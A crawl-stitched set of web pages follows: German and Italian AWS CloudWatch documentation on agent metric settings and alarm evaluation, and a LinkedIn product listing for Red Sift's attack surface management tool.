(nicht Powershell): TypePerf.exe –q Innerhalb des jeweiligen Objektabschnitts können Sie auch die folgenden optionalen Felder angeben: metrics_collection_interval – Optional. Gibt an, wie oft die Metriken für dieses Objekt erfasst werden und das globale metrics_collection_interval im Abschnitt agent der Konfigurationsdatei überschrieben wird. Der Wert wird in Sekunden angegeben. Beispiel: Angeben, dass 10 Metriken alle 10 Sekunden und 300 Metriken alle 5 Minuten gesammelt werden sollen. Wenn Sie diesen Wert auf weniger als 60 Sekunden festlegen, wird die jeweilige Metrik als hochauflösende Metrik erfasst. Weitere Informationen finden Sie unter Hochauflösende Metriken . append_dimensions – Optional. Gibt zusätzliche Dimensionen an, die nur für die Metriken für dieses Objekt verwendet werden sollen. Falls Sie dieses Feld angeben, wird es zusätzlich zu den im globalen Feld append_dimensions angegebenen Dimensionen verwendet, das für alle Typen von Metriken verwendet wird, die vom Agent erfasst werden. drop_original_metrics – Optional. Wenn Sie das aggregation_dimensions -Feld im metrics -Abschnitt verwenden, um Metriken zu aggregierten Ergebnissen zusammenzufassen, dann sendet der Agent standardmäßig sowohl die aggregierten Metriken als auch die ursprünglichen Metriken, die für jeden Wert der Dimension getrennt sind. Wenn Sie nicht möchten, dass die ursprünglichen Metriken an gesendet werden CloudWatch, können Sie diesen Parameter mit einer Liste von Metriken angeben. Für die zusammen mit diesem Parameter angegebenen Metriken werden keine Kennzahlen nach Dimension gemeldet CloudWatch. Stattdessen werden nur die aggregierten Metriken gemeldet. Dadurch verringert sich die Anzahl der Metriken, die der Agent erfasst, was Ihre Kosten senkt. Innerhalb des jeweiligen Zählerabschnitts können Sie auch die folgenden optionalen Felder angeben: rename — Gibt einen anderen Namen an, der CloudWatch für diese Metrik verwendet werden soll. unit – Gibt die für diese Metrik zu verwendende Einheit an. Bei der von Ihnen angegebenen Einheit muss es sich um eine gültige CloudWatch metrische Einheit handeln, wie in der Unit Beschreibung unter aufgeführt MetricDatum . Es gibt zwei weitere optionale Abschnitte, die Sie in metrics_collected aufnehmen können: statsd – Ermöglicht den Abruf benutzerdefinierter Metriken mittels StatsD -Protokoll. Der CloudWatch Agent fungiert als Daemon für das Protokoll. Sie können die Metriken mit einem beliebigen StatsD -Standardclient an den CloudWatch-Agenten senden. Weitere Informationen finden Sie unter Abrufen benutzerdefinierter Metriken mit StatsD . procstat – Ermöglicht den Abruf von Metriken aus einzelnen Prozessen. Weitere Informationen finden Sie unter Erfassen von Prozessmetriken mit dem procstat-Plugin . jmx – Optional. Gibt an, dass Sie Java Management Extensions (JMX)-Metriken von der Instance abrufen möchten. Weitere Informationen zu den Feldern, die in diesem Abschnitt verwendet werden können, und den Metriken, die erfasst werden können, finden Sie unter Erfassung von Java Management Extensions (JMX)-Metriken . otlp – Optional. Gibt an, dass Sie Metriken aus dem OpenTelemetry SDK sammeln möchten. Weitere Informationen über die Felder, die Sie in diesem Abschnitt verwenden können, finden Sie unter Erfassen Sie Metriken und Traces mit OpenTelemetry . Es folgt das Beispiel eines metrics -Abschnitts zur Verwendung unter Windows Server. In diesem Beispiel werden viele Windows-Metriken erfasst, und der Computer ist zusätzlich für das Empfangen weiterer Metriken von einem StatsD -Client eingerichtet | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/red-sift-hardenize/?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_full-click | ASM | LinkedIn Skip to main content LinkedIn Red Sift in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in ASM Network Monitoring Software by Red Sift See who's skilled in this Add as skill Learn more Report this product About Red Sift ASM (Attack Surface Management) continuously discovers, inventories and helps manage your business’s critical external-facing and cloud assets. Complete visibility Get a view into your entire attack surface – including assets you didn't know existed. Fix proactively Be aware of and remediate configuration risks before bad actors can take advantage. Reduce premiums Solve problems before they are visible to your insurer and reduce cyber insurance premiums. This product is intended for Information Technology Officer Chief Technology Officer Director of Information Technology Chief Information Officer Infrastructure Architect Infrastructure Engineer Information Security Analyst Information Security Officer Chief Information Security Officer Media Products media viewer No more previous content Leverage unmanaged attack surface data Identify mismanaged or unmanaged assets that other tools miss. Red Sift ASM continuously scans domains, hostnames, and IP addresses so your data is always fresh. Automated asset inventory Build an inventory of your external-facing and cloud assets without spreadsheets or manual processes. Connect to cloud providers, certificate authorities, registrars, and managed DNS providers to import and monitor all of your assets. Get complete visibility into cloud accounts Integrate with AWS, Google Cloud and Azure out-of-the-box for a more holistic view of the entire attack surface. Information to take action In-depth, real-time data about each asset makes it straightforward to take action as soon as a misconfiguration or unmanaged asset is identified. No more next content Featured customers of ASM DENIC eG Technology, Information and Internet 1,639 followers DigiCert Computer and Network Security 167,016 followers Rakuten Advertising Software Development 61,319 followers Coop Retail 173,677 followers Opera Software Development 60,862 followers Similar products NMS NMS Network Monitoring Software Network Operations Center (NOC) Network Operations Center (NOC) Network Monitoring Software Arbor Sightline Arbor Sightline Network Monitoring Software TEMS™ Suite TEMS™ Suite Network Monitoring Software Progress Flowmon Progress Flowmon Network Monitoring Software ONES (Open Networking Enterprise Suite) ONES (Open Networking Enterprise Suite) Network Monitoring Software Sign in to see more Show more Show less Red Sift products Brand Trust Brand Trust Email Security Software Certificates Certificates Network Monitoring Software OnDMARC OnDMARC Email Security Software Red Sift Red Sift Email Security Software LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html | Utilizzo degli CloudWatch allarmi Amazon - Amazon CloudWatch Utilizzo degli CloudWatch allarmi Amazon - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Stati degli allarmi di parametri Valutazione di un allarme Operazioni per gli allarmi Configurazione della modalità in cui gli allarmi trattano i dati mancanti Allarmi ad alta risoluzione Allarmi basati su espressioni matematiche Allarmi basati su percentile ed esempi di dati ridotti Caratteristiche comuni degli allarmi CloudWatch Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Utilizzo degli CloudWatch allarmi Amazon Puoi creare allarmi con parametri di controllo e inviare notifiche o apportare automaticamente modifiche alle risorse che stai monitorando quando viene superata una soglia. Ad esempio, puoi monitorare l'utilizzo della CPU e le operazioni di lettura e scrittura su disco delle tue EC2 istanze Amazon e quindi utilizzare tali dati per determinare se avviare istanze aggiuntive per gestire un carico maggiore. Puoi inoltre utilizzare questi dati per fermare le istanze poco utilizzate per risparmiare denaro. Puoi creare allarmi metrici e compositi in Amazon. CloudWatch Puoi creare allarmi sulle query di Metrics Insights che utilizzano i tag delle AWS risorse per filtrare e raggruppare le metriche. Per utilizzare i tag con gli allarmi, su, scegli Impostazioni. https://console.aws.amazon.com/connect/ Nella pagina CloudWatch Impostazioni , in Abilita i tag delle risorse sulla telemetria , scegli Abilita. Per un monitoraggio sensibile al contesto che si adatti automaticamente alla tua strategia di tagging, crea allarmi sulle query di Metrics Insights utilizzando i tag delle risorse. AWS Ciò consente di monitorare tutte le risorse taggate con applicazioni o ambienti specifici. Un allarme metrico controlla una singola metrica o il risultato di un' CloudWatch espressione matematica basata sulle metriche. CloudWatch L'allarme esegue una o più operazioni basate sul valore del parametro o espressione relativa a una soglia su un certo numero di periodi. L'azione può consistere nell'invio di una notifica a un argomento di Amazon SNS, nell'esecuzione di un' EC2 azione Amazon o di un'azione Amazon Auto EC2 Scaling, nell'avvio di un'indagine CloudWatch in indagini, indagini operative o nella creazione di un OpsItem incidente o in Systems Manager. Un allarme composito include un'espressione di regola che tiene conto degli stati di avviso di altri avvisi creati. L'allarme composito entra in stato ALARM solo se tutte le condizioni della regola sono soddisfatte. Gli allarmi specificati nell'espressione di regola di un allarme composito possono includere allarmi di parametri e altri allarmi compositi. L'utilizzo di allarmi compositi consente di ridurre il rumore dell'allarme. È possibile creare più allarmi di parametri e anche creare un allarme composito e impostare gli avvisi solo per l'allarme composito. Ad esempio, un composito potrebbe entrare in stato ALARM solo quando tutti gli allarmi dei parametri sottostanti sono in stato ALARM. Gli allarmi compositi possono inviare notifiche Amazon SNS quando cambiano stato e possono creare indagini, Systems OpsItems Manager o incidenti quando entrano nello stato ALARM, ma non possono eseguire azioni EC2 o azioni di Auto Scaling. Nota Puoi creare tutti gli allarmi che desideri nel tuo account. AWS Inoltre, puoi aggiungere allarmi ai pannelli di controllo, in modo da poter monitorare e ricevere avvisi relativi alle risorse e alle applicazioni AWS in più regioni. Dopo avere aggiunto un allarme a un pannello di controllo, l'allarme diventa grigio quando è nello stato INSUFFICIENT_DATA e rosso quando è nello stato ALARM . L'allarme non ha alcun colore quando è nello stato OK . Puoi anche aggiungere ai preferiti gli avvisi visitati di recente dall'opzione Preferiti e recenti nel pannello di navigazione della CloudWatch console. L'opzione Favorites and recents (Preferiti e recenti) contiene colonne per gli allarmi contrassegnati come preferiti e quelli consultati di recente. Un allarme richiama le operazioni solo quando lo stato dell'allarme cambia. L'eccezione è per gli allarmi con operazioni Auto Scaling. Per operazioni Auto Scaling, l'allarme continua a richiamare l'operazione una volta per ogni minuto durante il quale rimane nel nuovo stato. Un allarme può osservare una metrica nello stesso account. Se hai abilitato la funzionalità tra account nella tua CloudWatch console, puoi anche creare allarmi che controllano le metriche di altri account. AWS La creazione di allarmi compositi tra più account non è supportata. È supportata la creazione di allarmi tra più account che utilizzano espressioni matematiche, ad eccezione del fatto che le funzioni ANOMALY_DETECTION_BAND , INSIGHT_RULE e SERVICE_QUOTA non sono supportate per gli allarmi tra più account. Nota CloudWatch non verifica o convalida le azioni specificate, né rileva errori di Amazon EC2 Auto Scaling o Amazon SNS derivanti da un tentativo di richiamare azioni inesistenti. Assicurati che le tue operazioni relative agli allarmi esistano. Stati degli allarmi di parametri Un allarme di parametri può trovarsi nei possibili stati elencati di seguito: OK - Il parametro o espressione rientra nella soglia definita. ALARM - Il parametro o espressione non rientra nella soglia definita. INSUFFICIENT_DATA - L'allarme è stato appena attivato, il parametro non è disponibile o la quantità di dati non è sufficiente affinché il parametro determini lo stato dell'allarme. Valutazione di un allarme Quando crei un allarme, specifichi tre impostazioni per consentire di valutare quando modificare CloudWatch lo stato dell'allarme: Periodo è l'intervallo di tempo su cui valutare il parametro o l'espressione e creare ogni singolo punto di dati per un allarme. Viene espresso in secondi. Evaluation Periods (Periodi di valutazione) è il numero di periodi più recenti, o punti di dati, per valutare quando stabilire lo stato di allarme. Datapoints to Alarm (Punti di dati all'allarme) è il numero punti di dati all'interno dei periodi di valutazione che devono essere violati per fare in modo che l'allarme sia nello stato ALARM . I punti dati oggetto della violazione non devono essere consecutivi, ma devono solo essere tutti all'interno dell'ultimo numero di punti dati pari all' Evaluation Period (Periodo di valutazione). Per un periodo di almeno un minuto, un allarme viene valutato ogni minuto e la valutazione si basa sulla finestra temporale definita da Periodo e Periodi di valutazione . Ad esempio, se Periodo è di 5 minuti (300 secondi) e Periodi di valutazione è 1, alla fine del minuto 5 l'allarme viene valutato in base ai dati compresi tra 1 e 5 minuti. Quindi, alla fine del minuto 6, l'allarme viene valutato in base ai dati dal secondo al sesto minuto. Se il periodo di allarme è di 10 secondi, 20 secondi o 30 secondi, l'allarme viene valutato ogni 10 secondi. Se il numero di periodi di valutazione per un allarme moltiplicato per la durata di ciascun periodo di valutazione supera un giorno, l'allarme viene valutato una volta all'ora. Per ulteriori dettagli su come vengono valutati questi allarmi giornalieri, consulta l'esempio alla fine di questa sezione. Nella figura seguente, la soglia di allarme per un allarme dei parametri è impostata su tre unità. Sia l' Evaluation Period (Periodo di valutazione) che Datapoints to Alarm (Punti di dati all'allarme) sono 3. Quando tutti i punti dati esistenti nei tre periodi consecutivi più recenti sono sopra la soglia, l'allarme passa allo stato ALARM . Nella figura, questo accade dal terzo al quinto periodo di tempo. Al periodo sei, il valore scende sotto la soglia, perciò uno dei periodi valutati non effettua una violazione e lo stato dell'allarme cambia in OK . Durante il nono periodo di tempo, la soglia viene nuovamente superata, ma per un solo periodo. Di conseguenza, lo stato dell'allarme rimane OK . Quando si configura Evaluation Periods (Periodi di valutazione) e Datapoints to Alarm (Punti dati all'allarme) come valori diversi, si imposta un allarme "M su N". Datapoints to Alarm (Punti di dati all'allarme) è ("M") e Evaluation Periods (Periodi di valutazione) è ("N"). L'intervallo di valutazione è il numero di punti dati moltiplicato per il periodo. Ad esempio, se configuri 4 punti dati su 5 con un periodo di 1 minuto, l'intervallo di valutazione è di 5 minuti. Se configuri 3 punti dati su 3 con un periodo di 10 minuti, l'intervallo di valutazione è di 30 minuti. Nota Se i punti dati mancano subito dopo la creazione di un allarme e la metrica veniva riportata CloudWatch prima della creazione dell'allarme, CloudWatch recupera i punti dati più recenti precedenti alla creazione dell'allarme durante la valutazione dell'allarme. Esempio di valutazione di un allarme di più giorni Un allarme è considerato un allarme di più giorni se il numero di periodi di valutazione moltiplicato per la durata di ciascun periodo di valutazione supera un giorno. Gli allarmi di più giorni vengono valutati una volta all'ora. Quando vengono valutati gli allarmi con più giorni, durante la valutazione CloudWatch tiene conto solo delle metriche fino all'ora corrente al minuto 00. Ad esempio, consideriamo un allarme che monitora un processo che viene eseguito ogni 3 giorni alle 10:00. Alle 10:02, il processo fallisce. Alle 10:03, l'allarme viene valutato e rimane nello stato OK , poiché la valutazione considera i dati solo fino alle 10:00. Alle 11:03, l'allarme considera i dati fino alle 11:00 e passa allo stato ALARM . Alle 11:43, l'errore viene corretto e il processo ora viene eseguito correttamente. Alle 12:03, l'allarme viene nuovamente valutato, rileva che il processo è riuscito e torna allo stato OK . Operazioni per gli allarmi È possibile specificare le operazioni intraprese da un allarme quando cambia stato tra gli stati OK, ALARM e INSUFFICIENT_DATA. È possibile impostare la maggior parte delle operazioni per la transizione in ciascuno dei tre stati. Ad eccezione delle operazioni di dimensionamento automatico, le operazioni si verificano solo nelle transizioni di stato e non vengono più eseguite se la condizione persiste per ore o giorni. È possibile sfruttare il fatto che sono consentite più operazioni per un allarme per inviare un'e-mail quando viene superata una soglia e poi un'altra quando la condizione di violazione termina. Ciò consente di verificare che le operazioni di dimensionamento o ripristino vengano attivate quando previsto e funzionino come desiderato. Le seguenti sono supportate come operazioni di allarme. Inviare una notifica a uno o più abbonati tramite un argomento Amazon Simple Notification Service . Gli abbonati possono essere sia applicazioni che persone. Per informazioni complete su Amazon SNS, consulta Che cos'è Amazon SNS? . Richiamare una funzione Lambda . Questo è il modo più semplice per automatizzare le azioni personalizzate relative alle dello stato degli allarmi. Gli allarmi basati su EC2 metriche possono anche eseguire EC2 azioni, come l'arresto, la chiusura , il riavvio o il ripristino di un'istanza. EC2 Per ulteriori informazioni, consulta Crea allarmi per interrompere, terminare, riavviare o ripristinare un'istanza EC2 . Gli allarmi possono anche eseguire operazioni per dimensionare un gruppo Auto Scaling . Per ulteriori informazioni, consulta Step and simple scaling policies for Amazon EC2 Auto Scaling. Gli allarmi possono essere creati OpsItems in Systems Manager Ops Center o creare incidenti in AWS Systems Manager Incident Manager . Queste operazioni vengono eseguite solo quando l'allarme entra in stato ALARM. Per ulteriori informazioni, vedere Configurazione per la creazione CloudWatch a OpsItems partire da allarmi e Creazione di incidenti. Un allarme può avviare un'indagine quando entra in stato ALARM. Per ulteriori informazioni sulle CloudWatch indagini, vedere. CloudWatch indagini Gli allarmi emettono anche eventi Amazon EventBridge quando cambiano stato e puoi configurarli in modo Amazon EventBridge da attivare altre azioni per questi cambiamenti di stato. Per ulteriori informazioni, consulta Cos'è Amazon EventBridge? Configurazione del modo in cui gli CloudWatch allarmi trattano i dati mancanti A volte, non tutti i dati previsti per una metrica vengono segnalati. CloudWatch Questo può accadere, ad esempio, quando una connessione viene persa, un server è inattivo oppure quando un parametro comunica dati solo a intermittenza per progetto. CloudWatch consente di specificare come trattare i punti dati mancanti durante la valutazione di un allarme. Questo può aiutare a configurare l'allarme in modo che entri nello stato ALARM solo quando richiesto per il tipo di dati monitorati. È possibile evitare falsi positivi quando i dati mancanti non indicano un problema. Analogamente a come ogni allarme si trova sempre in uno dei tre stati, ogni punto dati specifico a cui viene segnalato CloudWatch rientra in una delle tre categorie seguenti: Non superato (entro la soglia) Superato (fuori dalla soglia) Mancante Per ogni allarme, puoi specificare di CloudWatch trattare i punti dati mancanti in uno dei seguenti modi: notBreaching - I punti dati mancanti vengono trattati come se fossero “corretti” e all'interno della soglia breaching - I punti dati mancanti vengono trattati come se fossero “errati” e violassero la soglia ignore - Lo stato dell'allarme attuale viene mantenuto missing - Se mancano tutti i punti di dati nell'intervallo di valutazione degli allarmi, l'allarme passa a INSUFFICIENT_DATA. La scelta migliore dipende dal tipo di metrica e dallo scopo dell'allarme. Ad esempio, se si sta creando un allarme di rollback dell'applicazione utilizzando una metrica che segnala continuamente i dati mancanti, potrebbe essere consigliabile trattare i punti di dati mancanti come se violassero la regola, in quanto ciò potrebbe indicare un problema. Tuttavia, per un parametro che genera punti dati solo quando si verifica un errore, ad esempio ThrottledRequests in Amazon DynamoDB, i dati mancanti potrebbero venire trattati come notBreaching . Il comportamento predefinito è missing . Importante Gli allarmi configurati sui EC2 parametri di Amazon possono entrare temporaneamente nello stato INSUFFICIENT_DATA se mancano dei punti dati dei parametri. Questo è raro, ma può verificarsi quando il reporting dei parametri viene interrotto, anche quando l' EC2 istanza Amazon è integra. Per gli allarmi sui EC2 parametri di Amazon configurati per eseguire azioni di arresto, terminazione, riavvio o ripristino, ti consigliamo di configurare tali allarmi in modo che trattino i dati mancanti come missing e che questi allarmi si attivino solo quando si trovano nello stato ALARM. La scelta dell'opzione migliore per il tuo allarme previene modifiche della condizione dell'allarme non necessarie e fuorvianti e indica anche in maniera più accurata la verifica del sistema. Importante Gli allarmi che valutano i parametri nello AWS/DynamoDB spazio dei nomi ignorano sempre i dati mancanti anche se si sceglie un'opzione diversa per il modo in cui l'allarme dovrebbe trattare i dati mancanti. Quando un AWS/DynamoDB parametro ha dati mancanti, gli allarmi che valutano quel parametro rimangono nello stato attuale. Come viene valutato lo stato dell'allarme quando mancano i dati Ogni volta che un allarme valuta se cambiare stato, CloudWatch tenta di recuperare un numero di punti dati superiore al numero specificato come Periodi di valutazione. L'esatto numero di punti di dati che tenta di recuperare dipende dalla durata del periodo di allarme e se si basa su un parametro con risoluzione standard o ad alta risoluzione. L'intervallo di tempo dei punti dati che tenta di recuperare è l'intervallo di valutazione . Una volta CloudWatch recuperati questi punti dati, accade quanto segue: Se non mancano punti dati nell'intervallo di valutazione, CloudWatch valuta l'allarme in base ai punti dati più recenti raccolti. Il numero di punti dati valutato è uguale agli Evaluation Periods (Periodi di valutazione) per l'allarme. I punti dati aggiuntivi provenienti da un punto più indietro nel tempo nell'intervallo di valutazione non sono necessari e vengono ignorati. Se mancano alcuni punti dati nell'intervallo di valutazione, ma il numero totale di punti dati esistenti che sono stati recuperati con successo dall'intervallo di valutazione è uguale o superiore ai Periodi di valutazione dell'allarme, CloudWatch valuta lo stato dell'allarme in base ai punti dati reali più recenti che sono stati recuperati con successo, inclusi i punti dati aggiuntivi necessari da più lontano nell'intervallo di valutazione. In questo caso, il valore impostato per la modalità di gestione dei dati mancanti non è necessario e verrà ignorato. Se mancano alcuni punti dati nell'intervallo di valutazione e il numero di punti dati effettivi recuperati è inferiore al numero di periodi di valutazione dell'avviso, CloudWatch inserisce i punti dati mancanti con il risultato specificato per il trattamento dei dati mancanti, quindi valuta l'allarme. Tuttavia, tutti i punti dati reali nell'intervallo di valutazione sono inclusi nella valutazione. CloudWatch utilizza i punti dati mancanti solo il minor numero di volte possibile. Nota Un caso particolare di questo comportamento è che gli CloudWatch allarmi potrebbero rivalutare ripetutamente l'ultimo set di punti dati per un periodo di tempo dopo che la metrica ha smesso di scorrere. Questa rivalutazione può comportare la modifica dello stato dell'allarme e una nuova esecuzione delle operazioni, se lo stato fosse stato modificato immediatamente prima dell'arresto del flusso del parametro. Per mitigare questo comportamento, utilizzare periodi più brevi. Le seguenti tabelle illustrano esempi del comportamento di valutazione dell'allarme. Nella prima tabella, Datapoints to Alarm e Evaluation Periods sono entrambi 3. CloudWatch recupera i 5 punti dati più recenti durante la valutazione dell'allarme, nel caso in cui manchino alcuni dei 3 punti dati più recenti. 5 è l'intervallo di valutazione dell'allarme. Nella colonna 1 vengono visualizzati i 5 punti dati più recenti, poiché l'intervallo di valutazione è 5. Questi punti dati vengono visualizzati con il punto di dati più recente a destra. 0 è un punto di dati che non supera la soglia, X è un punto di dati che viola la soglia e - è un punto di dati mancante. Nella colonna 2 sono mostrati quanti dei 3 punti di dati necessari risultano mancanti. Anche se vengono valutati gli ultimi 5 punti di dati, ne sono necessari solo 3 (l'impostazione di Evaluation Periods (Periodi di valutazione)) per valutare lo stato dell'allarme. Il numero di punti di dati nella colonna 2 rappresenta il numero di dati che devono essere "riempiti", utilizzando l'impostazione relativa al trattamento dei dati mancanti. Nelle colonne 3-6, le intestazioni di colonna sono i valori possibili per come trattare i dati mancanti. Le righe di queste colonne mostrano lo stato di allarme impostato per ciascuno di questi modi possibili per trattare i dati mancanti. Punti di dati N di punti di dati che devono essere riempiti MANCANTE IGNORA VIOLAZIONE NON VIOLAZIONE 0 - X - X 0 OK OK OK OK - - - - 0 2 OK OK OK OK - - - - - 3 INSUFFICIENT_DATA Mantieni lo stato attuale ALARM OK 0 X X - X 0 ALARM ALARM ALARM ALARM - - X - - 2 ALARM Mantieni lo stato attuale ALARM OK Nella seconda riga della tabella precedente, l'allarme rimane OK anche se i dati mancanti vengono trattati come violazione, perché il singolo punto dati esistente non sta effettuando una violazione e questo aspetto viene valutato insieme a due punti dati mancanti trattati come violazione. La prossima volta in cui questo allarme viene valutato, se i dati sono ancora mancanti si visualizzerà ALARM e il punto dati di non-violazione non rientrerà più nell'intervallo di valutazione. La terza riga, in cui mancano tutti e cinque i punti di dati più recenti, illustra come le varie impostazioni per il trattamento dei dati mancanti influiscano sullo stato dell'allarme. Se i punti di dati mancanti sono considerati una violazione, l'allarme entra in stato ALARM, mentre se non sono considerati una violazione, l'allarme entra in stato OK. Se i punti di dati mancanti vengono ignorati, l'allarme mantiene lo stato corrente che aveva prima dei punti di dati mancanti. E se i punti di dati mancanti sono solo considerati mancanti, allora l'allarme non ha abbastanza dati reali recenti per effettuare una valutazione ed entra nello stato INSUFFICIENT_DATA. Nella quarta riga, l'allarme entra nello stato ALARM in tutti i casi perché i tre punti di dati più recenti costituiscono una violazione, e gli Evaluation Periods (Periodi di valutazione) e i Datapoints to Alarm (Punti di dati all'allarme) sono entrambi impostati su 3. In questo caso, il punto di dati mancante viene ignorato e l'impostazione della modalità di valutazione dei dati mancanti non è necessaria, poiché sono disponibili 3 punti di dati reali da valutare. La riga 5 rappresenta un caso speciale di valutazione dell'allarme chiamato stato di allarme prematuro . Per ulteriori informazioni, consulta la pagina Evitare transizioni premature allo stato di allarme . Nella tabella seguente, il Period (Periodo) è di nuovo impostato su 5 minuti e Datapoints to Alarm (Punti dati all'allarme) è solo 2 mentre i Evaluation Periods (Periodi di valutazione) è 3. Questo è un 2 su 3, allarme M di N. L'intervallo di valutazione è 5. Questo è il numero massimo di punti dati recenti che vengono recuperati e che è possibile utilizzare nel caso in cui alcuni punti dati risultino mancanti. Punti di dati Numero di punti di dati mancanti MANCANTE IGNORA VIOLAZIONE NON VIOLAZIONE 0 - X - X 0 ALARM ALARM ALARM ALARM 0 0 X 0 X 0 ALARM ALARM ALARM ALARM 0 - X - - 1 OK OK ALARM OK - - - - 0 2 OK OK ALARM OK - - - - X 2 ALARM Mantieni lo stato attuale ALARM OK Nelle righe 1 e 2, l'allarme passa sempre allo stato ALARM perché 2 dei 3 punti di dati più recenti stanno costituendo una violazione. Nella riga 2, i due punti di dati più vecchi nell'intervallo di valutazione non sono necessari perché non manca nessuno dei tre punti di dati più recenti, quindi questi due punti di dati meno recenti vengono ignorati. Nelle righe 3 e 4, l'allarme passa allo stato ALARM solo se i dati mancanti vengono trattati come violazione, nel qual caso i due punti di dati mancanti più recenti vengono entrambi trattati come violazione. Nella riga 4, questi due punti di dati mancanti trattati come una violazione forniscono i due punti di dati oggetto violazione necessari per attivare lo stato ALARM. La riga 5 rappresenta un caso speciale di valutazione dell'allarme chiamato stato di allarme prematuro . Per ulteriori informazioni, consulta la sezione seguente. Evitare transizioni premature allo stato di allarme CloudWatch la valutazione degli allarmi include una logica per cercare di evitare falsi allarmi, in cui l'allarme passa prematuramente allo stato ALARM quando i dati sono intermittenti. L'esempio mostrato nella riga 5 delle tabelle della sezione precedente illustra questa logica. In queste righe e negli esempi seguenti, gli Evaluation Periods (Periodi di valutazione) sono 3 e l'intervallo di valutazione è di 5 punti di dati. Datapoints to Alarm (Punti di dati all'allarme) è 3, ad eccezione dell'esempio M di N, dove Datapoints to alarm (Punti di dati all'allarme) è 2. Supponiamo che i dati più recenti di un allarme siano - - - - X , con quattro punti di dati mancanti e quindi un punto di dati oggetto di violazione come punto di dati più recente. Poiché il punto di dati successivo potrebbe non costituire una violazione, l'allarme non entra immediatamente in stato ALARM quando i dati sono - - - - X o - - - X - e Datapoints to Alarm (Punti di dati all'allarme) è 3. In questo modo, i falsi positivi vengono evitati quando il punto di dati successivo non costituisce una violazione e fa sì che i dati siano - - - X O o - - X - O . Tuttavia, se gli ultimi punti di dati sono - - X - - , l'allarme entra in stato ALARM anche se i punti di dati mancanti vengono trattati come mancanti. Questo perché gli allarmi sono progettati per entrare sempre nello stato ALARM quando il punto di dati oggetto di violazione meno recente disponibile durante il numero di Periodi di valutazione di punti di dati è vecchio almeno quanto il valore di Punti di dati all'allarme e tutti gli altri punti di dati più recenti costituiscono una violazione o sono mancanti. In questo caso, l'allarme entra in stato ALARM anche se il numero totale di punti di dati disponibili è inferiore a M ( Datapoints to Alarm (Punti di dati all'allarme)). Questa logica di allarme si applica anche a M allarmi su N. Se il punto di dati oggetto di violazione meno recente durante l'intervallo di valutazione è vecchio almeno quanto il valore di Datapoints to Alarm (Punti di dati all'allarme) e tutti i punti di dati più recenti costituiscono una violazione o sono mancanti, l'allarme entra in stato ALARM indipendentemente dal valore di M ( Datapoints to Alarm (Punti di dati all'allarme)). Come vengono valutati i dati parziali di una query di Approfondimenti sulle metriche Se la query di Approfondimenti sulle metriche utilizzata per l'allarme corrisponde a più di 10.000 parametri, l'allarme viene valutato in base ai primi 10.000 parametri trovati dalla query. Ciò significa che l'allarme viene valutato sulla base di dati parziali. Per sapere se un allarme di Approfondimenti sulle metriche sta valutando il suo stato di allarme sulla base di dati parziali, puoi utilizzare i seguenti metodi: Nella console, quando selezioni un allarme per visualizzare la pagina Details (Dettagli), viene mostrato il messaggio Evaluation warning: Not evaluating all data (Avviso di valutazione: impossibile valutare tutti i dati). Il valore PARTIAL_DATA nel EvaluationState campo viene visualizzato quando si utilizza il comando describe-alarms o l'API AWS CLI . DescribeAlarms Gli allarmi pubblicano anche eventi su Amazon EventBridge quando passa allo stato parziale dei dati, quindi puoi creare una EventBridge regola per controllare questi eventi. In questi eventi, il campo evaluationState presenta il valore PARTIAL_DATA . Di seguito è riportato un esempio di : { "version": "0", "id": "12345678-3bf9-6a09-dc46-12345EXAMPLE", "detail-type": "CloudWatch Alarm State Change", "source": "aws.cloudwatch", "account": "123456789012", "time": "2022-11-08T11:26:05Z", "region": "us-east-1", "resources": [ "arn:aws:cloudwatch:us-east-1: 123456789012 :alarm: my-alarm-name " ], "detail": { "alarmName": " my-alarm-name ", "state": { "value": "ALARM", "reason": "Threshold Crossed: 3 out of the last 3 datapoints [20000.0 (08/11/22 11:25:00), 20000.0 (08/11/22 11:24:00), 20000.0 (08/11/22 11:23:00)] were greater than the threshold (0.0) (minimum 1 datapoint for OK -> ALARM transition).", "reasonData": " { \"version\":\"1.0\",\"queryDate\":\"2022-11-08T11:26:05.399+0000\",\"startDate\":\"2022-11-08T11:23:00.000+0000\",\"period\":60,\"recentDatapoints\":[20000.0,20000.0,20000.0],\"threshold\":0.0,\"evaluatedDatapoints\":[ { \"timestamp\":\"2022-11-08T11:25:00.000+0000\",\"value\":20000.0}]}", "timestamp": "2022-11-08T11:26:05.401+0000", "evaluationState": "PARTIAL_DATA" }, "previousState": { "value": "INSUFFICIENT_DATA", "reason": "Unchecked: Initial alarm creation", "timestamp": "2022-11-08T11:25:51.227+0000" }, "configuration": { "metrics": [ { "id": "m2", "expression": "SELECT SUM(PartialDataTestMetric) FROM partial_data_test", "returnData": true, "period": 60 } ] } } } Se la query per l'allarme include un'istruzione GROUP BY che inizialmente restituisce più di 500 serie temporali, l'allarme viene valutato in base alle prime 500 serie temporali rilevate dalla query. Tuttavia, se utilizzi una clausola ORDER BY, tutte le serie temporali rilevate dalla query vengono ordinate e le 500 serie temporali con valori più alti o più bassi in base alla clausola ORDER BY vengono utilizzate per valutare l'allarme. Allarmi ad alta risoluzione Se imposti un allarme su una metrica ad alta risoluzione, puoi specificare un allarme ad alta risoluzione con un periodo di 10 secondi, 20 secondi o 30 secondi, oppure puoi impostare un allarme regolare con un periodo di qualsiasi multiplo di più di 60 secondi. Per gli allarmi ad alta risoluzione il costo è più elevato. Per ulteriori informazioni sui parametri ad alta risoluzione, consulta Publish custom metrics . Allarmi basati su espressioni matematiche Puoi impostare un allarme in base al risultato di un'espressione matematica che è basata su uno o più parametri CloudWatch. Un'espressione matematica utilizzata per un allarme può includere fino a 10 parametri. Ogni parametro deve utilizzare lo stesso periodo. Per un allarme basato su un'espressione matematica, puoi specificare come vuoi CloudWatch trattare i punti dati mancanti. In questo caso, il punto dati viene considerato mancante se l'espressione matematica non restituisce un valore per quel punto dati. Gli allarmi basati su espressioni matematiche non possono eseguire azioni Amazon EC2 . 